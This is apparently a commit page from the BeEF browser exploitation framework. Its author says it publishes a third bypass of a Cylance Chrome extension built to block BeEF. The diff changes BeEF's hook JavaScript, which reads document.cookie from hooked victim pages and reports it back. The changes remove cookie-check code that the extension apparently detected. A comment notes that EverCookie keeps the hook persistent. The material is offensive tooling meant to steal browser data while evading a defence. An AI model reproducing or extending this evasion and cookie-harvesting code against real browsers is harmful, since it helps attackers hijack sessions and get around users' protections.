Had to publish the 3th bypass for Vegan anti-BeEF Chrome extension from Cylance.
This commit is contained in:
antisnatchor
@@ -2680,18 +2680,12 @@ beef.browser = {
|
||||
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
|
||||
try {
|
||||
var cookies = document.cookie;
|
||||
var veglol = beef.browser.cookie.veganLol();
|
||||
var has_session_cookies = (beef.browser.cookie.hasSessionCookies(veglol)) ? "Yes" : "No";
|
||||
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies(veglol)) ? "Yes" : "No";
|
||||
/* Never stop the madness dear C.
|
||||
* var veglol = beef.browser.cookie.veganLol();
|
||||
*/
|
||||
if (cookies) details['Cookies'] = cookies;
|
||||
if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
|
||||
if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
|
||||
} catch (e) {
|
||||
// the hooked origin is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
|
||||
// and there is no reason to read cookies at this point
|
||||
details['Cookies'] = "Cookies can't be read. The hooked origin is most probably using HttpOnly.";
|
||||
details['hasSessionCookies'] = "No";
|
||||
details['hasPersistentCookies'] = "No";
|
||||
}
|
||||
|
||||
if (browser_name) details['BrowserName'] = browser_name;
|
||||
|
||||
@@ -72,6 +72,7 @@ beef.browser.cookie = {
|
||||
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
|
||||
},
|
||||
|
||||
/* Never stop the madness dear C. */
|
||||
veganLol: function (){
|
||||
var to_hell= '';
|
||||
var min = 17;
|
||||
|
||||
@@ -323,8 +323,7 @@ module BeEF
|
||||
components = [
|
||||
'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
|
||||
'HasWebSocket', 'HasWebRTC', 'HasActiveX',
|
||||
'HasQuickTime', 'HasRealPlayer', 'HasWMP',
|
||||
'hasSessionCookies', 'hasPersistentCookies'
|
||||
'HasQuickTime', 'HasRealPlayer', 'HasWMP'
|
||||
]
|
||||
components.each do |k|
|
||||
v = get_param(@data['results'], k)
|
||||
|
||||
Reference in New Issue
Block a user